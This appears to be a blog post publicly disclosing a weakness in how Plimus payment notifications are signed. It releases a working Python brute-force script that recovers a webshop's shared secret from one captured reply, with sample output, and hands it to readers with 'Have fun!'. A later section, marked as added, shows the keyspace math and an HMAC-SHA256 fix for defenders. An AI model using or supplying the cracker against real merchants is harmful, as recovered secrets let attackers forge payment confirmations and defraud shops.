How to crack Plimus "MD5hex encryption"
It's been a while since I reported a few security bugs to Plimus. It took a few blog posts
explaining the issues publicly before I got in contact with an engineer. I understand that making
backwards-incompatible changes to your customer-facing APIs is not a trivial task, however the
way Plimus handles these issues is just terrible.
One engineer asks me for more feedback while in the same mail thread another Plimus employee
demands proof that I'm PCI certified and wants to know what applications I'm going to build before I
get access to the Plimus test API. If you don't even let me test security bugs before I report
them, you won't get the bug report at all. Maybe I can test them after you have gone live and
customers already depend on the API.
The first actual promised date for a simple fix passed five days ago. Since then I have gotten no
response. They even refused to acknowledge in advance what exactly they were going to fix.
For your enjoyment I have written proof-of-concept code that you can use to crack the shared
secret between Plimus and a webshop. This secret is the only thing with which transactions
between a webshop and Plimus are signed and authenticated. Have fun!
Once you have the reply a webshop gives to a Plimus IPN (in this example the MD5 hex string
"8c083afc16dfe31e5d92a6358f33297d"), you can recover the key like this:
$ python crack_plimus_hmac.py 8c083afc16dfe31e5d92a6358f33297d
Trying length 1
Trying length 2
Trying length 3
Trying length 4
Data Protection Key: SCRT
And the source code (crack_plimus_hmac.py):
import sys
import hashlib
from itertools import product

CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
MAXLENGTH = 4

# The MD5 hex reply captured from the webshop, passed on the command line
target = sys.argv[1]

for length in range(1, MAXLENGTH + 1):
    print("Trying length", length)
    for password in product(CHARSET, repeat=length):
        key = "".join(password)
        # The webshop's reply is simply md5("OK" + key), so every candidate key
        # can be checked offline against the one captured reply
        if target == hashlib.md5(("OK" + key).encode()).hexdigest():
            print("Data Protection Key:", key)
            sys.exit(0)
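To make the weakness concrete from the defending side, here is an added example (not code from the post or from Plimus) that sizes the keyspace the brute force above has to walk, and sets a proper replacement beside it: a 256-bit random data protection key and an HMAC-SHA256 over the message content, verified with a constant-time comparison. The reply message format used here is a hypothetical one constructed for the example; it is not Plimus' real IPN format.

```python
import hashlib
import hmac
import secrets


def keyspace_size(charset, maxlength):
    """Number of candidate keys the brute force has to try: every string of
    1..maxlength characters drawn from charset."""
    return sum(len(charset) ** length for length in range(1, maxlength + 1))


def weak_reply(key):
    """The scheme the post attacks: an unkeyed hash over a fixed prefix plus the
    secret. One captured reply is enough to grind through the whole keyspace."""
    return hashlib.md5(("OK" + key).encode()).hexdigest()


def generate_key(nbytes=32):
    """A data protection key that cannot be brute-forced: 256 random bits,
    rendered as hex so it still fits in a plain text configuration field."""
    return secrets.token_hex(nbytes)


def strong_reply(key, message):
    """Keyed MAC over the actual content being authenticated (hypothetical
    format: status plus the IPN's transaction fields), so neither the key nor
    the message can be swapped without detection."""
    return hmac.new(key.encode(), message.encode(), hashlib.sha256).hexdigest()


def verify_reply(key, message, received):
    """Constant-time comparison so response timing does not leak how many
    leading characters of the signature matched."""
    return hmac.compare_digest(strong_reply(key, message), received)


if __name__ == "__main__":
    uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    print("Keys of 1-4 uppercase letters:", keyspace_size(uppercase, 4))
    print("Keys of 32 random bytes:", 256 ** 32)
    print("Weak reply for key SCRT:", weak_reply("SCRT"))

    key = generate_key()
    # Constructed sample message; the real IPN fields would go here
    msg = "OK|transactionId=12345|amount=19.99"
    sig = strong_reply(key, msg)
    print("Valid signature accepted:", verify_reply(key, msg, sig))
    print("Tampered amount accepted:", verify_reply(key, msg.replace("19.99", "0.01"), sig))
```

The point of the contrast: with four uppercase letters the whole keyspace is under half a million candidates, which the loop in the post exhausts in well under a second, while a 32-byte random key puts the same attack beyond reach regardless of how fast MD5 can be computed. Tying the MAC to the message content (instead of a constant "OK") is what stops a captured reply from being replayed for a different transaction.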